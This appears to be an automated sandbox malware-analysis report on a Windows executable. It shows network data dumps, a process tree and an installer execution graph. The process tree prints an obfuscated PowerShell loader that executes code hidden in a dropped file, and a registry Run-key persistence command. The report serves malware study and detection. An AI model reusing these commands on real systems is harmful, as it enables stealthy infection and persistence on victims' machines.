                                                2024-12-13 07:50:39 UTC1255INData Raw: a7 ba 6e 7e 01 b2 44 f8 83 aa b4 5f 59 4e c7 96 30 72 fa fc 7c 8d ce b1 2c fd 44 3b 2c dd 9d 11 e4 8e 5a b3 e4 c1 b9 76 f8 d4 a0 90 4b 30 6d ad ef c0 b4 97 f1 24 d4 1f 67 bb 9f b2 d2 23 d0 21 73 2c 48 24 1c ec 38 d0 9f 9d 1d aa cd 87 7f 3b 95 39 6c 31 09 c4 3e 64 49 14 77 19 1b 00 10 6d 96 27 22 04 97 30 c4 95 5d c1 88 76 79 ba 87 e8 33 de fe 1b 18 08 c6 ee 40 a9 59 72 b2 bf 04 89 f4 e7 6c c1 19 a5 25 37 dd 74 97 c7 55 26 a9 0c 6d 36 66 c9 f8 8e 71 46 8d e8 f5 2e 46 ba 7d 08 a7 ca 43 77 8f 45 58 d3 06 db ae 5c 73 7a 8b db 94 ab ec a3 27 fc 76 93 9c 74 c2 05 4b d2 ad ce 6e ef 0e 07 1a 6f ed 94 e9 ae 94 67 17 fc 1c 47 b9 2c f8 b9 b9 a4 26 46 2c 80 93 1d 60 7a 07 3d 1a 4f 84 9d ee b1 57 ad bb 60 6c 56 1d 37 47 33 21 bb 58 05 bb 0f bf 9d bc 2e f9 dd 7f af 37
                                                Data Ascii: n~D_YN0r|,D;,ZvK0m$g#!s,H$8;9l1>dIwm'"0]vy3@Yrl%7tU&m6fqF.F}CwEX\sz'vtKnogG,&F,`z=OW`lV7G3!X.7
                                                2024-12-13 07:50:39 UTC1255INData Raw: 88 0e 12 a3 f8 92 25 db 02 d8 08 55 75 87 f6 a2 ca b3 b1 91 23 32 ed c7 c6 7c 10 7b d9 73 52 66 4c f6 02 a7 d1 a6 f8 93 5e 7c 36 18 c9 c7 d5 00 b6 a6 cd e9 4c f8 cc f5 17 3d e3 3e 7f cf fa 34 01 39 94 4b 41 a2 5b 72 e3 9e 13 a3 b5 81 44 db f7 17 44 cb e6 13 19 f6 b5 4a 02 f9 cc 89 11 95 f1 1a 12 7f 7a c1 ee b0 89 e5 cf 3d e8 f1 19 0a 24 7f 01 19 61 33 10 d0 14 7d 0c 7f aa 8b f6 f1 b3 78 ff 46 0a 2d 37 f8 c0 61 f4 ba f2 a0 01 f8 ee 3a ed 2a e4 44 5a 3f c8 4f ca b8 41 43 67 da d9 40 68 05 dc 5e 43 1b e6 33 c0 1b d8 78 c6 26 62 54 da 99 e8 a2 75 b3 38 95 03 59 fb 5a 91 c6 25 d2 07 e3 a6 82 4a f0 18 d9 43 3e df 5a 22 30 d7 bc 9f 63 8f 65 eb 5e 03 85 e0 be cc e9 1e 53 15 ea cd 4d fc 0e 31 ec c0 6b c5 9b 93 83 76 2c 50 39 af 98 5c b7 7d 55 1e 13 f6 83 70 25 47
                                                Data Ascii: %Uu#2|{sRfL^|6L=>49KA[rDDJz=$a3}xF-7a:*DZ?OACg@h^C3x&bTu8YZ%JC>Z"0ce^SM1kv,P9\}Up%G
                                                2024-12-13 07:50:39 UTC1255INData Raw: f5 7e 7a ce d2 04 ee 69 25 49 d6 60 77 d3 12 1b 29 03 fe dd a3 bf f0 84 42 3e e1 6d bc 2c 2b 40 d0 4b e2 64 3b 1f a7 72 9f cf 47 38 58 95 f4 8d 14 6e 1f 40 a5 1c 98 48 0a ca 90 35 4d a2 9a e8 80 4e 13 71 6a 37 1d f6 71 a7 3f 2c 7e b4 30 eb 76 eb 5a c6 10 d1 1f 88 4d f1 ab ee 1e cc ca bd 77 e8 b2 de 34 2c a2 f5 83 76 af 89 0c ac c8 f2 a2 bb 92 d2 88 72 89 56 c5 f0 16 0b 8b 08 08 67 7e c8 2f 83 76 89 82 d2 b9 66 26 d2 76 35 7b a6 da 91 6c 3d 7d d3 dc c2 6c 5a 73 4c d0 ea bf 58 95 92 22 5d c9 0f 38 89 a2 ef 78 be f2 d1 89 f6 f9 6c 22 b3 cd a7 4f ed fa e9 91 13 e2 cd 04 7a 0b 35 7d e1 fa e7 1b f5 a1 7f d4 ad 76 06 3a b2 d7 5f c5 97 a9 c2 bc 5a 7f a4 6f 53 6e 88 fa 32 40 80 6a 4f ea c8 83 b9 28 0f 5e 31 7c 03 71 36 16 9b a1 d6 2f f4 b0 3a 3c 40 b3 85 d9 88 b9
                                                Data Ascii: ~zi%I`w)B>m,+@Kd;rG8Xn@H5MNqj7q?,~0vZMw4,vrVg~/vf&v5{l=}lZsLX"]8xl"Oz5}v:_ZoSn2@jO(^1|q6/:<@
                                                2024-12-13 07:50:39 UTC1255INData Raw: b3 07 c0 1d 6f 73 06 19 e1 4a 55 61 6e a0 14 d0 df 76 2e e7 78 a7 f4 c8 04 93 c7 ef 22 31 59 c9 10 79 87 56 d9 bb e1 25 20 fc a5 f1 7e bc b7 48 0b a0 2f 47 1f 72 2c 43 7f 70 be 4b 8a 63 28 93 62 dc c2 c7 21 d7 98 b5 ce 9b 2d 7b a9 20 8d ad ad 05 0d cd e0 21 ca 93 25 e2 4c a9 7a 45 b6 c0 d1 97 65 95 fd 52 a9 64 f9 fc 57 c9 bb 6e 40 d5 4c 6d aa fa 63 91 10 72 00 5e 80 65 10 e8 5b f2 45 f9 b3 66 92 ef fa fc 3f 9a 6c f5 68 20 e1 47 3b ad 99 15 04 c5 ac 08 2e 40 b3 a1 5d b3 de 5e 82 d5 c0 59 82 0d 45 1a 33 05 be 15 34 eb f0 2a 46 1f a6 61 8e e5 ca 79 9b aa e8 89 4f 50 76 32 b7 9a 6d 56 4d cb 29 51 97 2f e7 f2 ed 20 d4 23 ee 93 ed c5 97 43 9c 3c d0 f1 af 99 19 87 17 e6 81 ae 42 84 a6 af 51 e7 1b 5e df 01 5e ed 5f 24 60 33 10 67 8a c7 c9 ae 6c d2 62 44 ce 26 c5
                                                Data Ascii: osJUanv.x"1YyV% ~H/Gr,CpKc(b!-{ !%LzEeRdWn@Lmcr^e[Ef?lh G;.@]^YE34*FayOPv2mVM)Q/ #C<BQ^^_$`3glbD&


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:02:50:08
                                                Start date:13/12/2024
                                                Path:C:\Users\user\Desktop\x295IO8kqM.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\x295IO8kqM.exe"
                                                Imagebase:0x400000
                                                File size:1'044'016 bytes
                                                MD5 hash:3E4417C519A6DC532E433AD673BFA553
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:02:50:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"Powershell.exe" -windowstyle minimized "$Coriin = Get-Content -raw 'C:\Users\user\AppData\Roaming\woady\roadshow\Declarative.Udt' ; $Diodens=$Coriin.SubString(73160,3);.$Diodens($Coriin)
                                                Imagebase:0x120000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:02:50:10
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66cfd0000
                                                File size:875'008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:02:50:25
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                Imagebase:0x950000
                                                File size:59'904 bytes
                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:false

                                                Target ID:4
                                                Start time:02:50:33
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
                                                Imagebase:0x890000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:02:50:33
                                                Start date:13/12/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff66cfd0000
                                                File size:875'008 bytes
                                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:6
                                                Start time:02:50:33
                                                Start date:13/12/2024
                                                Path:C:\Windows\SysWOW64\reg.exe
                                                Wow64 process (32bit):true
                                                Commandline:REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Feries" /t REG_EXPAND_SZ /d "%Galliasses% -windowstyle 1 $Misconceiving=(gp -Path 'HKCU:\Software\Materialeanskaffelsernes\').Applikationstilpasninger;%Galliasses% ($Misconceiving)"
                                                Imagebase:0xdd0000
                                                File size:59'392 bytes
                                                MD5 hash:CDD462E86EC0F20DE2A1D781928B1B0C
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:19.8%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:21.3%
                                                  Total number of Nodes:1327
                                                  Total number of Limit Nodes:25
                                                  execution_graph 3873 402840 3874 402bbf 18 API calls 3873->3874 3876 40284e 3874->3876 3875 402864 3878 405bca 2 API calls 3875->3878 3876->3875 3877 402bbf 18 API calls 3876->3877 3877->3875 3879 40286a 3878->3879 3901 405bef GetFileAttributesW CreateFileW 3879->3901 3881 402877 3882 402883 GlobalAlloc 3881->3882 3883 40291a 3881->3883 3886 402911 CloseHandle 3882->3886 3887 40289c 3882->3887 3884 402922 DeleteFileW 3883->3884 3885 402935 3883->3885 3884->3885 3886->3883 3902 403222 SetFilePointer 3887->3902 3889 4028a2 3890 40320c ReadFile 3889->3890 3891 4028ab GlobalAlloc 3890->3891 3892 4028bb 3891->3892 3893 4028ef 3891->3893 3894 403027 36 API calls 3892->3894 3895 405ca1 WriteFile 3893->3895 3896 4028c8 3894->3896 3897 4028fb GlobalFree 3895->3897 3899 4028e6 GlobalFree 3896->3899 3898 403027 36 API calls 3897->3898 3900 40290e 3898->3900 3899->3893 3900->3886 3901->3881 3902->3889 3903 401cc0 3904 402ba2 18 API calls 3903->3904 3905 401cc7 3904->3905 3906 402ba2 18 API calls 3905->3906 3907 401ccf GetDlgItem 3906->3907 3908 402531 3907->3908 3909 4029c0 3910 402ba2 18 API calls 3909->3910 3911 4029c6 3910->3911 3912 4029f9 3911->3912 3913 40281e 3911->3913 3915 4029d4 3911->3915 3912->3913 3914 40603c 18 API calls 3912->3914 3914->3913 3915->3913 3917 405f61 wsprintfW 3915->3917 3917->3913 3918 401fc3 3919 401fd5 3918->3919 3929 402087 3918->3929 3920 402bbf 18 API calls 3919->3920 3922 401fdc 3920->3922 3921 401423 25 API calls 3925 4021e1 3921->3925 3923 402bbf 18 API calls 3922->3923 3924 401fe5 3923->3924 3926 401ffb LoadLibraryExW 3924->3926 3927 401fed GetModuleHandleW 3924->3927 3928 40200c 3926->3928 3926->3929 3927->3926 3927->3928 3938 406463 WideCharToMultiByte 3928->3938 3929->3921 3932 402056 3934 405179 25 API calls 3932->3934 3933 40201d 3935 401423 25 API calls 3933->3935 3936 40202d 3933->3936 3934->3936 3935->3936 3936->3925 3937 402079 FreeLibrary 3936->3937 3937->3925 3939 40648d GetProcAddress 3938->3939 3940 402017 3938->3940 3939->3940 3940->3932 3940->3933 3941 4016c4 3942 402bbf 18 API calls 3941->3942 3943 4016ca GetFullPathNameW 3942->3943 3945 4016e4 3943->3945 3950 401706 3943->3950 3944 40171b GetShortPathNameW 3946 402a4c 3944->3946 3947 40635d 2 API calls 3945->3947 3945->3950 3948 4016f6 3947->3948 3948->3950 3951 40601a lstrcpynW 3948->3951 3950->3944 3950->3946 3951->3950 3962 40194e 3963 402bbf 18 API calls 3962->3963 3964 401955 lstrlenW 3963->3964 3965 402531 3964->3965 3966 4027ce 3967 4027d6 3966->3967 3968 4027da FindNextFileW 3967->3968 3970 4027ec 3967->3970 3969 402833 3968->3969 3968->3970 3972 40601a lstrcpynW 3969->3972 3972->3970 3973 4048cf 3974 4048fb 3973->3974 3975 4048df 3973->3975 3977 404901 SHGetPathFromIDListW 3974->3977 3978 40492e 3974->3978 3984 405743 GetDlgItemTextW 3975->3984 3979 404911 3977->3979 3980 404918 SendMessageW 3977->3980 3982 40140b 2 API calls 3979->3982 3980->3978 3981 4048ec SendMessageW 3981->3974 3982->3980 3984->3981 3985 401754 3986 402bbf 18 API calls 3985->3986 3987 40175b 3986->3987 3988 405c1e 2 API calls 3987->3988 3989 401762 3988->3989 3989->3989 3997 401d56 GetDC GetDeviceCaps 3998 402ba2 18 API calls 3997->3998 3999 401d74 MulDiv ReleaseDC 3998->3999 4000 402ba2 18 API calls 3999->4000 4001 401d93 4000->4001 4002 40603c 18 API calls 4001->4002 4003 401dcc CreateFontIndirectW 4002->4003 4004 402531 4003->4004 4005 401a57 4006 402ba2 18 API calls 4005->4006 4007 401a5d 4006->4007 4008 402ba2 18 API calls 4007->4008 4009 401a05 4008->4009 4010 4014d7 4011 402ba2 18 API calls 4010->4011 4012 4014dd Sleep 4011->4012 4014 402a4c 4012->4014 4015 40155b 4016 4029f2 4015->4016 4019 405f61 wsprintfW 4016->4019 4018 4029f7 4019->4018 4020 401ddc 4021 402ba2 18 API calls 4020->4021 4022 401de2 4021->4022 4023 402ba2 18 API calls 4022->4023 4024 401deb 4023->4024 4025 401df2 ShowWindow 4024->4025 4026 401dfd EnableWindow 4024->4026 4027 402a4c 4025->4027 4026->4027 4028 401bdf 4029 402ba2 18 API calls 4028->4029 4030 401be6 4029->4030 4031 402ba2 18 API calls 4030->4031 4032 401bf0 4031->4032 4033 401c00 4032->4033 4034 402bbf 18 API calls 4032->4034 4035 401c10 4033->4035 4036 402bbf 18 API calls 4033->4036 4034->4033 4037 401c1b 4035->4037 4038 401c5f 4035->4038 4036->4035 4040 402ba2 18 API calls 4037->4040 4039 402bbf 18 API calls 4038->4039 4041 401c64 4039->4041 4042 401c20 4040->4042 4044 402bbf 18 API calls 4041->4044 4043 402ba2 18 API calls 4042->4043 4045 401c29 4043->4045 4046 401c6d FindWindowExW 4044->4046 4047 401c31 SendMessageTimeoutW 4045->4047 4048 401c4f SendMessageW 4045->4048 4049 401c8f 4046->4049 4047->4049 4048->4049 4050 4022df 4051 402bbf 18 API calls 4050->4051 4052 4022ee 4051->4052 4053 402bbf 18 API calls 4052->4053 4054 4022f7 4053->4054 4055 402bbf 18 API calls 4054->4055 4056 402301 GetPrivateProfileStringW 4055->4056 4057 401960 4058 402ba2 18 API calls 4057->4058 4059 401967 4058->4059 4060 402ba2 18 API calls 4059->4060 4061 401971 4060->4061 4062 402bbf 18 API calls 4061->4062 4063 40197a 4062->4063 4064 40198e lstrlenW 4063->4064 4065 4019ca 4063->4065 4066 401998 4064->4066 4066->4065 4070 40601a lstrcpynW 4066->4070 4068 4019b3 4068->4065 4069 4019c0 lstrlenW 4068->4069 4069->4065 4070->4068 4071 401662 4072 402bbf 18 API calls 4071->4072 4073 401668 4072->4073 4074 40635d 2 API calls 4073->4074 4075 40166e 4074->4075 4076 4066e2 4078 406566 4076->4078 4077 406ed1 4078->4077 4079 4065f0 GlobalAlloc 4078->4079 4080 4065e7 GlobalFree 4078->4080 4081 406667 GlobalAlloc 4078->4081 4082 40665e GlobalFree 4078->4082 4079->4077 4079->4078 4080->4079 4081->4077 4081->4078 4082->4081 4083 4019e4 4084 402bbf 18 API calls 4083->4084 4085 4019eb 4084->4085 4086 402bbf 18 API calls 4085->4086 4087 4019f4 4086->4087 4088 4019fb lstrcmpiW 4087->4088 4089 401a0d lstrcmpW 4087->4089 4090 401a01 4088->4090 4089->4090 4091 4025e5 4092 402ba2 18 API calls 4091->4092 4100 4025f4 4092->4100 4093 40272d 4094 40263a ReadFile 4094->4093 4094->4100 4095 405c72 ReadFile 4095->4100 4097 40267a MultiByteToWideChar 4097->4100 4098 40272f 4113 405f61 wsprintfW 4098->4113 4100->4093 4100->4094 4100->4095 4100->4097 4100->4098 4101 4026a0 SetFilePointer MultiByteToWideChar 4100->4101 4102 402740 4100->4102 4104 405cd0 SetFilePointer 4100->4104 4101->4100 4102->4093 4103 402761 SetFilePointer 4102->4103 4103->4093 4105 405cec 4104->4105 4111 405d08 4104->4111 4106 405c72 ReadFile 4105->4106 4107 405cf8 4106->4107 4108 405d11 SetFilePointer 4107->4108 4109 405d39 SetFilePointer 4107->4109 4107->4111 4108->4109 4110 405d1c 4108->4110 4109->4111 4112 405ca1 WriteFile 4110->4112 4111->4100 4112->4111 4113->4093 3079 401e66 3097 402bbf 3079->3097 3086 401edb CloseHandle 3089 40281e 3086->3089 3087 401e8c WaitForSingleObject 3088 401e9e 3087->3088 3090 401eb0 GetExitCodeProcess 3088->3090 3117 406430 3088->3117 3092 401ec2 3090->3092 3093 401ecf 3090->3093 3121 405f61 wsprintfW 3092->3121 3093->3086 3096 401ecd 3093->3096 3096->3086 3098 402bcb 3097->3098 3122 40603c 3098->3122 3101 401e6c 3103 405179 3101->3103 3104 405194 3103->3104 3113 401e76 3103->3113 3105 4051b0 lstrlenW 3104->3105 3106 40603c 18 API calls 3104->3106 3107 4051d9 3105->3107 3108 4051be lstrlenW 3105->3108 3106->3105 3110 4051ec 3107->3110 3111 4051df SetWindowTextW 3107->3111 3109 4051d0 lstrcatW 3108->3109 3108->3113 3109->3107 3112 4051f2 SendMessageW SendMessageW SendMessageW 3110->3112 3110->3113 3111->3110 3112->3113 3114 4056fa CreateProcessW 3113->3114 3115 401e7c 3114->3115 3116 40572d CloseHandle 3114->3116 3115->3086 3115->3087 3115->3089 3116->3115 3118 40644d PeekMessageW 3117->3118 3119 406443 DispatchMessageW 3118->3119 3120 401ea5 WaitForSingleObject 3118->3120 3119->3118 3120->3088 3121->3096 3137 406049 3122->3137 3123 406294 3124 402bec 3123->3124 3156 40601a lstrcpynW 3123->3156 3124->3101 3140 4062ae 3124->3140 3126 4060fc GetVersion 3126->3137 3127 406262 lstrlenW 3127->3137 3128 40603c 10 API calls 3128->3127 3131 406177 GetSystemDirectoryW 3131->3137 3133 40618a GetWindowsDirectoryW 3133->3137 3134 4062ae 5 API calls 3134->3137 3135 40603c 10 API calls 3135->3137 3136 406203 lstrcatW 3136->3137 3137->3123 3137->3126 3137->3127 3137->3128 3137->3131 3137->3133 3137->3134 3137->3135 3137->3136 3138 4061be SHGetSpecialFolderLocation 3137->3138 3149 405ee7 RegOpenKeyExW 3137->3149 3154 405f61 wsprintfW 3137->3154 3155 40601a lstrcpynW 3137->3155 3138->3137 3139 4061d6 SHGetPathFromIDListW CoTaskMemFree 3138->3139 3139->3137 3141 4062bb 3140->3141 3143 406331 3141->3143 3144 406324 CharNextW 3141->3144 3147 406310 CharNextW 3141->3147 3148 40631f CharNextW 3141->3148 3157 4059fb 3141->3157 3142 406336 CharPrevW 3142->3143 3143->3142 3145 406357 3143->3145 3144->3141 3144->3143 3145->3101 3147->3141 3148->3144 3150 405f5b 3149->3150 3151 405f1b RegQueryValueExW 3149->3151 3150->3137 3152 405f3c RegCloseKey 3151->3152 3152->3150 3154->3137 3155->3137 3156->3124 3158 405a01 3157->3158 3159 405a17 3158->3159 3160 405a08 CharNextW 3158->3160 3159->3141 3160->3158 3264 401767 3265 402bbf 18 API calls 3264->3265 3266 40176e 3265->3266 3267 401796 3266->3267 3268 40178e 3266->3268 3328 40601a lstrcpynW 3267->3328 3327 40601a lstrcpynW 3268->3327 3271 401794 3275 4062ae 5 API calls 3271->3275 3272 4017a1 3329 4059ce lstrlenW CharPrevW 3272->3329 3277 4017b3 3275->3277 3280 4017c5 CompareFileTime 3277->3280 3281 401885 3277->3281 3282 40185c 3277->3282 3285 40601a lstrcpynW 3277->3285 3291 40603c 18 API calls 3277->3291 3302 405bca GetFileAttributesW 3277->3302 3305 405bef GetFileAttributesW CreateFileW 3277->3305 3332 40635d FindFirstFileW 3277->3332 3335 40575f 3277->3335 3280->3277 3283 405179 25 API calls 3281->3283 3284 405179 25 API calls 3282->3284 3292 401871 3282->3292 3286 40188f 3283->3286 3284->3292 3285->3277 3306 403027 3286->3306 3289 4018b6 SetFileTime 3290 4018c8 CloseHandle 3289->3290 3290->3292 3293 4018d9 3290->3293 3291->3277 3294 4018f1 3293->3294 3295 4018de 3293->3295 3297 40603c 18 API calls 3294->3297 3296 40603c 18 API calls 3295->3296 3299 4018e6 lstrcatW 3296->3299 3300 4018f9 3297->3300 3299->3300 3301 40575f MessageBoxIndirectW 3300->3301 3301->3292 3303 405be9 3302->3303 3304 405bdc SetFileAttributesW 3302->3304 3303->3277 3304->3303 3305->3277 3308 403040 3306->3308 3307 40306b 3339 40320c 3307->3339 3308->3307 3351 403222 SetFilePointer 3308->3351 3312 403088 GetTickCount 3323 40309b 3312->3323 3313 4031ac 3314 4031b0 3313->3314 3319 4031c8 3313->3319 3316 40320c ReadFile 3314->3316 3315 4018a2 3315->3289 3315->3290 3316->3315 3317 40320c ReadFile 3317->3319 3318 40320c ReadFile 3318->3323 3319->3315 3319->3317 3320 405ca1 WriteFile 3319->3320 3320->3319 3322 403101 GetTickCount 3322->3323 3323->3315 3323->3318 3323->3322 3324 40312a MulDiv wsprintfW 3323->3324 3342 406533 3323->3342 3349 405ca1 WriteFile 3323->3349 3325 405179 25 API calls 3324->3325 3325->3323 3327->3271 3328->3272 3330 4017a7 lstrcatW 3329->3330 3331 4059ea lstrcatW 3329->3331 3330->3271 3331->3330 3333 406373 FindClose 3332->3333 3334 40637e 3332->3334 3333->3334 3334->3277 3336 405774 3335->3336 3337 4057c0 3336->3337 3338 405788 MessageBoxIndirectW 3336->3338 3337->3277 3338->3337 3352 405c72 ReadFile 3339->3352 3343 406558 3342->3343 3344 406560 3342->3344 3343->3323 3344->3343 3345 4065f0 GlobalAlloc 3344->3345 3346 4065e7 GlobalFree 3344->3346 3347 406667 GlobalAlloc 3344->3347 3348 40665e GlobalFree 3344->3348 3345->3343 3345->3344 3346->3345 3347->3343 3347->3344 3348->3347 3350 405cbf 3349->3350 3350->3323 3351->3307 3353 403076 3352->3353 3353->3312 3353->3313 3353->3315 4114 401ee9 4115 402bbf 18 API calls 4114->4115 4116 401ef0 4115->4116 4117 40635d 2 API calls 4116->4117 4118 401ef6 4117->4118 4120 401f07 4118->4120 4121 405f61 wsprintfW 4118->4121 4121->4120 3478 40326a SetErrorMode GetVersion 3479 4032a5 3478->3479 3480 40329f 3478->3480 3566 406384 GetSystemDirectoryW 3479->3566 3481 4063f4 5 API calls 3480->3481 3481->3479 3483 4032bb lstrlenA 3483->3479 3484 4032cb 3483->3484 3569 4063f4 GetModuleHandleA 3484->3569 3487 4063f4 5 API calls 3488 4032da #17 OleInitialize SHGetFileInfoW 3487->3488 3575 40601a lstrcpynW 3488->3575 3490 403317 GetCommandLineW 3576 40601a lstrcpynW 3490->3576 3492 403329 GetModuleHandleW 3493 403341 3492->3493 3494 4059fb CharNextW 3493->3494 3495 403350 CharNextW 3494->3495 3496 40347a GetTempPathW 3495->3496 3504 403369 3495->3504 3577 403239 3496->3577 3498 403492 3499 403496 GetWindowsDirectoryW lstrcatW 3498->3499 3500 4034ec DeleteFileW 3498->3500 3501 403239 12 API calls 3499->3501 3587 402dee GetTickCount GetModuleFileNameW 3500->3587 3505 4034b2 3501->3505 3502 4059fb CharNextW 3502->3504 3504->3502 3511 403465 3504->3511 3513 403463 3504->3513 3505->3500 3507 4034b6 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3505->3507 3506 403500 3508 4035b7 ExitProcess CoUninitialize 3506->3508 3519 4059fb CharNextW 3506->3519 3549 4035a3 3506->3549 3512 403239 12 API calls 3507->3512 3509 4036ed 3508->3509 3510 4035cd 3508->3510 3515 403771 ExitProcess 3509->3515 3516 4036f5 GetCurrentProcess OpenProcessToken 3509->3516 3514 40575f MessageBoxIndirectW 3510->3514 3671 40601a lstrcpynW 3511->3671 3517 4034e4 3512->3517 3513->3496 3522 4035db ExitProcess 3514->3522 3523 403741 3516->3523 3524 40370d LookupPrivilegeValueW AdjustTokenPrivileges 3516->3524 3517->3500 3517->3508 3527 40351f 3519->3527 3526 4063f4 5 API calls 3523->3526 3524->3523 3525 4035b3 3525->3508 3539 403748 3526->3539 3528 4035e3 3527->3528 3529 40357d 3527->3529 3674 4056e2 3528->3674 3531 405ad6 18 API calls 3529->3531 3534 403589 3531->3534 3532 40375d ExitWindowsEx 3532->3515 3535 40376a 3532->3535 3534->3508 3672 40601a lstrcpynW 3534->3672 3536 40140b 2 API calls 3535->3536 3536->3515 3537 403604 lstrcatW lstrcmpiW 3537->3508 3540 403620 3537->3540 3538 4035f9 lstrcatW 3538->3537 3539->3532 3539->3535 3542 403625 3540->3542 3543 40362c 3540->3543 3677 405648 CreateDirectoryW 3542->3677 3682 4056c5 CreateDirectoryW 3543->3682 3544 403598 3673 40601a lstrcpynW 3544->3673 3615 403863 3549->3615 3550 403631 SetCurrentDirectoryW 3551 403641 3550->3551 3552 40364c 3550->3552 3685 40601a lstrcpynW 3551->3685 3686 40601a lstrcpynW 3552->3686 3555 40603c 18 API calls 3556 40368b DeleteFileW 3555->3556 3557 403698 CopyFileW 3556->3557 3563 40365a 3556->3563 3557->3563 3558 4036e1 3559 405ebb 38 API calls 3558->3559 3561 4036e8 3559->3561 3560 405ebb 38 API calls 3560->3563 3561->3508 3562 40603c 18 API calls 3562->3563 3563->3555 3563->3558 3563->3560 3563->3562 3564 4056fa 2 API calls 3563->3564 3565 4036cc CloseHandle 3563->3565 3564->3563 3565->3563 3567 4063a6 wsprintfW LoadLibraryExW 3566->3567 3567->3483 3570 406410 3569->3570 3571 40641a GetProcAddress 3569->3571 3573 406384 3 API calls 3570->3573 3572 4032d3 3571->3572 3572->3487 3574 406416 3573->3574 3574->3571 3574->3572 3575->3490 3576->3492 3578 4062ae 5 API calls 3577->3578 3579 403245 3578->3579 3580 40324f 3579->3580 3581 4059ce 3 API calls 3579->3581 3580->3498 3582 403257 3581->3582 3583 4056c5 2 API calls 3582->3583 3584 40325d 3583->3584 3687 405c1e 3584->3687 3691 405bef GetFileAttributesW CreateFileW 3587->3691 3589 402e2e 3609 402e3e 3589->3609 3692 40601a lstrcpynW 3589->3692 3591 402e54 3592 405a1a 2 API calls 3591->3592 3593 402e5a 3592->3593 3693 40601a lstrcpynW 3593->3693 3595 402e65 GetFileSize 3596 402f61 3595->3596 3614 402e7c 3595->3614 3694 402d8a 3596->3694 3598 402f6a 3600 402f9a GlobalAlloc 3598->3600 3598->3609 3706 403222 SetFilePointer 3598->3706 3599 40320c ReadFile 3599->3614 3705 403222 SetFilePointer 3600->3705 3601 402fcd 3606 402d8a 6 API calls 3601->3606 3604 402f83 3607 40320c ReadFile 3604->3607 3605 402fb5 3608 403027 36 API calls 3605->3608 3606->3609 3610 402f8e 3607->3610 3612 402fc1 3608->3612 3609->3506 3610->3600 3610->3609 3611 402d8a 6 API calls 3611->3614 3612->3609 3612->3612 3613 402ffe SetFilePointer 3612->3613 3613->3609 3614->3596 3614->3599 3614->3601 3614->3609 3614->3611 3616 4063f4 5 API calls 3615->3616 3617 403877 3616->3617 3618 40387d 3617->3618 3619 40388f 3617->3619 3723 405f61 wsprintfW 3618->3723 3620 405ee7 3 API calls 3619->3620 3621 4038bf 3620->3621 3623 4038de lstrcatW 3621->3623 3625 405ee7 3 API calls 3621->3625 3624 40388d 3623->3624 3707 403b39 3624->3707 3625->3623 3628 405ad6 18 API calls 3629 403910 3628->3629 3630 4039a4 3629->3630 3633 405ee7 3 API calls 3629->3633 3631 405ad6 18 API calls 3630->3631 3632 4039aa 3631->3632 3635 4039ba LoadImageW 3632->3635 3636 40603c 18 API calls 3632->3636 3634 403942 3633->3634 3634->3630 3639 403963 lstrlenW 3634->3639 3643 4059fb CharNextW 3634->3643 3637 403a60 3635->3637 3638 4039e1 RegisterClassW 3635->3638 3636->3635 3642 40140b 2 API calls 3637->3642 3640 403a17 SystemParametersInfoW CreateWindowExW 3638->3640 3641 403a6a 3638->3641 3644 403971 lstrcmpiW 3639->3644 3645 403997 3639->3645 3640->3637 3641->3525 3646 403a66 3642->3646 3647 403960 3643->3647 3644->3645 3648 403981 GetFileAttributesW 3644->3648 3649 4059ce 3 API calls 3645->3649 3646->3641 3651 403b39 19 API calls 3646->3651 3647->3639 3650 40398d 3648->3650 3652 40399d 3649->3652 3650->3645 3653 405a1a 2 API calls 